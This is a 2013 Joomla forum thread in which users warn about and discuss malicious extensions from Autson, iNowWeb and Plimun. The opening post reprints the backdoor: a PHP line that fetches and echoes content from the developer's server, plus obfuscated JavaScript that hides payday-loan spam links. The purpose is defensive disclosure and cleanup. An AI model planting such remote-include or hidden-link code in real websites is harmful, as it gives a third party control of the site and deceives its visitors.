Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

Here you can contact the editors of our Extensions site, as well as access infomation relating to this site.

Moderator: JED Team

Forum rules
Forum Rules
READ ME <-- please read before posting, this means YOU.
Locked
alphaprodigy
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Mar 22, 2013 10:55 pm

Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

Post by alphaprodigy » Sat Mar 23, 2013 12:45 am

This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and do can whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

Code: Select all

<?php 
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
or

Code: Select all

<?php 
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc..The file on there server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

Code: Select all

<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
		
<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
or

Code: Select all

<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:

Code: Select all

autson.com , inowweb.com , plimun.com
The actions of developers like this adversely affects the entire Joomla community and we must do something to stop it.
Last edited by mandville on Sat Mar 23, 2013 6:41 pm, edited 1 time in total.
Reason: retitled to be more descriptive. malicious backlink code is not a vulnerability or exploit. Links found in generated code without proof of site control or infection.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by mandville » Sat Mar 23, 2013 5:10 am

It is actions like this that get a dev banned from the Jed. This dev was banned long ago
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

alphaprodigy
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Mar 22, 2013 10:55 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by alphaprodigy » Sat Mar 23, 2013 7:14 am

Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know its unrealistic to reach every webmaster, but every little bit helps.

delhidjinn
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Mon Apr 27, 2009 6:21 pm
Location: New Delhi, India
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by delhidjinn » Wed Mar 27, 2013 3:12 pm

Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by Webdongle » Wed Mar 27, 2013 3:21 pm

alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Wed Mar 27, 2013 4:21 pm

Also to note that occasionally a developer will upload a clean extension to the jed for checking and then once the hits start rolling in, upload a dodgy package to their website.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12781
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by brian » Wed Mar 27, 2013 4:44 pm

Webdongle wrote:
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
The JED can only react to reports. I personally spotted this issue and reported it to the JED who took action immediately
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Post by Webdongle » Wed Mar 27, 2013 5:05 pm

brian wrote:...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

User avatar
brian
Joomla! Master
Joomla! Master
Posts: 12781
Joined: Fri Aug 12, 2005 7:19 am
Location: Leeds, UK
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by brian » Wed Mar 27, 2013 5:08 pm

Sadly its not possible to ensure that the version uploaded is the same as the version that is available for download. Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44019
Joined: Sat Apr 05, 2008 9:58 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by Webdongle » Wed Mar 27, 2013 5:53 pm

brian wrote:... Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
That's a good point ... pity there are not more people checking.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

delhidjinn
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Mon Apr 27, 2009 6:21 pm
Location: New Delhi, India
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by delhidjinn » Thu Mar 28, 2013 2:38 am

I've have become economical in the use of Joomla extensions. Especially since I have upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Now days I am very strict in incorporating extensions in my website. Some of extensions I cannot do without, and have to use them.

I believe, eventually in a few years time, Joomla would have most of the basic requirements of a website built in native.
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."

jfdutoit
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Mon Mar 28, 2011 2:43 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by jfdutoit » Mon Apr 08, 2013 11:19 am

Wow, I'm quite surprised that someone would do so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I grateful that he notified me, I surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet. as soon as I get a chance, I'll check all my clients.
Francois du Toit
Webpreneur
Latest Niche Site: http://www.health2u.co.za/during-pregnancy
http://www.ezywebsites.co.za

Vering
Joomla! Apprentice
Joomla! Apprentice
Posts: 24
Joined: Sat Mar 17, 2012 6:53 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by Vering » Tue Apr 09, 2013 4:00 pm

You have my greatest thanks, alphaprodigy. I've immediately remove the malicious code from the Autson Slideshow.

suklamc
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue Apr 09, 2013 11:06 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by suklamc » Tue Apr 09, 2013 11:11 pm

Additional Behaviour noticed with [spam] for Joomla! :

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above mentioned extension used to load an unsecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago). when Linkedin (and maybe social options were selected), a nasty browser warning (for loading unsecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension)

2>Another aspect worth mentioning the above mentioned backlinks are not loaded in some configurations (but is definitely loaded when LinkedIN is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove (or just remove the malicious code)

as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed)

luigipepe
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 22, 2012 2:11 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by luigipepe » Sun Apr 14, 2013 9:07 am

I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi

mark4740
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Apr 08, 2013 9:06 pm
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mark4740 » Tue Apr 16, 2013 10:07 am

Thanks for the email,I seem to have removed the script and deleted the plugin, Seems to only have been on my home page as i can`t see it on any of the other page sources (i hope). Does anyone know a safe plugin for the twitter/facebook/google icons on my website so i can tweet/like post new products i list?

mark4740
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Mon Apr 08, 2013 9:06 pm
Contact:

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mark4740 » Tue Apr 16, 2013 10:02 pm

i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Tue Apr 16, 2013 11:35 pm

mark4740 wrote:i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?
You are relying on the belief that people feel compelled to come here and say "me2" "+1" "i owe you my first born"
the OP did their apparent civic duty informing people to the issue, this is not the proverbial field of dreams.
people downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most peoples stories regarding this developer
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

edirect
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Apr 20, 2013 3:29 am

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by edirect » Sat Apr 20, 2013 3:36 am

I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw

techdoctor_gr
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Apr 27, 2013 4:01 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by techdoctor_gr » Sat Apr 27, 2013 4:06 pm

Thanks for the email, the script have removed when deleted the plugin!

paulfoos
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Thu Feb 12, 2009 4:32 pm

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by paulfoos » Mon Feb 03, 2014 5:04 pm

I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Post by mandville » Mon Feb 03, 2014 6:22 pm

paulfoos wrote: had to search through my site for the vulnerability.
with all due respect please do not confuse "malicious" with "vulnerable"
I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
the extensions are listed there http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

quite often extensions downloaded from the devs website have "extra" code not in the zip provided to jed for checking
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}


Locked

Return to “extensions.joomla.org - Feedback/Information”